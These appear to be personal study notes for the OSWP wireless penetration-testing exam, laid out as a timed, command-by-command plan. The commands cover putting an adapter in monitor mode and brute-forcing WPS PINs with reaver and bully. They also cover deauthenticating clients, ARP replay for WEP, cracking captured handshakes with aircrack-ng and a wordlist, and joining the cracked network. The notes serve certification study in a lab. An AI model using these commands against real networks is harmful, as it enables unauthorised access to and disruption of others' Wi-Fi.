OWSP

Offensive Security Wireless Professional

##System Prerequisites

-Make sure to have a webcamera

-Make sure to update all drivers beforehand to screenshare screens for proctoring

-Make sure to have a quiet environment with a stable internet connection

-Have either a Kali VM or a Kali baremetal prepared

## Preliminary: Connect to Test Environment (5 minutes)

**Commands:**

tar xvfz exam-connection.tar.bz2

sudo openvpn OS-XXXXXX-OSWP.ovpn

**Credentials:** Add username and password from email.

##Strategy

Use the software on their provided Kali

---

### 1. Environment Setup (5 minutes)

**Command:**

sudo airmon-ng

**Screenshot:** List of available wireless interfaces.

---

### 2. Monitoring Mode (5 minutes)

**Command:**

sudo airmon-ng start wlan1

**Screenshot:** Confirm monitoring mode.

---

### 3. Scanning Networks (5 minutes)

**Command:**

sudo airodump-ng wlan1mon

**Screenshot:** All visible networks.

#### Fine-Tuning (5 minutes)

**Command:**

sudo airodump-ng wlan1mon -c [Channel] -w ssid

**Screenshot:** Refined search.

---

### 4. The Hack (40 minutes)

#### WPS (20 minutes)

**Commands:**

sudo reaver -i wlan1mon -b [BSSID] -vv

sudo bully wlan1mon -b [BSSID] -c [Channel] --force

**Screenshot:** Cracked WPS PIN and WPA key.

#### WPA/PSK2 (20 minutes)

**Command:**

sudo aireplay-ng -0 6 -a [BSSID] wlan1mon

**Screenshot:** Deauthentication packets.

#### WPA-MGT (20 minutes)

make a rogue hotspot

Based on the following auth methods use a different host.conf file

peap

MSCHAP

EAP

---

### 5. The Capture (10 minutes)

**Screenshot:** Handshake or sufficient data.

---

### 6. The Crack (20 minutes)

**Command:**

sudo aircrack-ng -w /etc/share/wordlists/rockyou.txt hash.txt

**Screenshot:** Cracked password.

---

### 7. Connect to Cracked Network (10 minutes)

**For WEP:**

sudo iwconfig wlan0 essid [ESSID] key [WEP Key]

sudo dhclient wlan0

**For WPA/WPA2:**

sudo wpa_supplicant -i wlan0 -c wpa_supplicant.conf -B

sudo dhclient wlan0

**Screenshot:** Successful connection.

---

### 8. The Flag (5 minutes)

**Access Proof:** `http://192.168.1.1/proof.txt`

**Screenshot:** Proof.

---

### 9.1 Exporting Obsidian Notes for Report (5 minutes)

**Export Notes**: In Obsidian, go to the note you want to export, click on the three-dot menu, and choose `Export → Export as Markdown (.md)`.

---

### 9.2 Generating the Final Report Using OSCP Exam Report Generator (10 minutes)

**Clone Repository**:

```bash

git clone https://github.com/initinfosec/OSCP-Exam-Report-Template-Markdown.git

```

**Install Required Software and Template**:

./setup.sh

**Copy Markdown Report**: Paste your exported Obsidian notes into the template, below the header.

**Generate PDF and Archive**:

ruby generate.rb

**Manual Verification**: Check PDF and 7z archive for accuracy.

---

## Final Reporting and Submission (15 minutes)

**7z Archiving:**

```bash

7z a -t7z OSWP-XXXXXX-Exam-Report.7z OSWP-XXXXXX-Exam-Report.pdf

```

**Upload:**

- Upload at `https://upload.offsec.com`.

- Verify the MD5 hash.

**Confirmation:** Check email for upload success.

Old Edits

Prep notes for the exam

Getting set up

sudo airmon-ng
sudo airmon-ng start wlan1
sudo airodump wlan1mon
1. Look for target and channel
2. redo for the channel specifically
sudo airodump wlan1mon -c 11 -w ssid
1. press s to sort during capture
2. o to turn on colors
3. a to change display
4. d for defaults
5. i for invert
6. q for quit and q again to confirm

The Hack

Two major components of Wi-Fi hacking

WPS
1. Reaver
2. Bully (Faster and newer)
  1. sudo bully wlan1mon -b E4:BE:ED:CC:6B:16 -c 11 --force
WPA/PSK2
1. Have the capture running
2. sudo aireplay-ng -0 6 -a E4:BE:ED:CC:6B:16 wlan1mon

The Crack

Aircrack-ng -w etc/share/wordlists/rockyou.txt hash.txt

The Flag

Go to http://192.168.1.1/proof.txt

Refined version

1. Environment Setup

Kali Linux is recommended, which comes with necessary wireless testing tools.

2. Monitoring Mode

airmon-ng start wlan0: Put your Wi-Fi adapter into monitoring mode.

3. Scanning Networks

airodump-ng wlan0mon: Scan for nearby Wi-Fi networks.

4. WEP Cracking

Capture Data Packets

airodump-ng -c [channel] --bssid [BSSID] -w output wlan0mon: Start capturing data packets.

ARP Replay Attack

aireplay-ng -3 -b [BSSID] -h [Your MAC] wlan0mon: Speed up data packet capture.

Crack WEP Key

aircrack-ng output.cap: Crack the WEP key.

5. WPA/WPA2 Cracking

Capture Handshake

airodump-ng -c [channel] --bssid [BSSID] -w output wlan0mon: Capture handshake packets.

Deauthenticate Client

aireplay-ng -0 1 -a [BSSID] -c [Client MAC] wlan0mon: Force client to reauthenticate, capturing the handshake.

Dictionary Attack

aircrack-ng -w wordlist.txt -b [BSSID] output.cap: Use a dictionary attack to crack the WPA/WPA2 passphrase.

6. Connecting to Cracked Networks

For WEP: iwconfig wlan0 essid [ESSID] key [WEP key]
For WPA/WPA2: Use wpa_supplicant or manually update the wpa_supplicant.conf file and reinitialize the network interface.

7. Final Reporting

Document every step, command, and result.

Focus on these aspects and practice as much as possible to be well-prepared for the OSWP exam.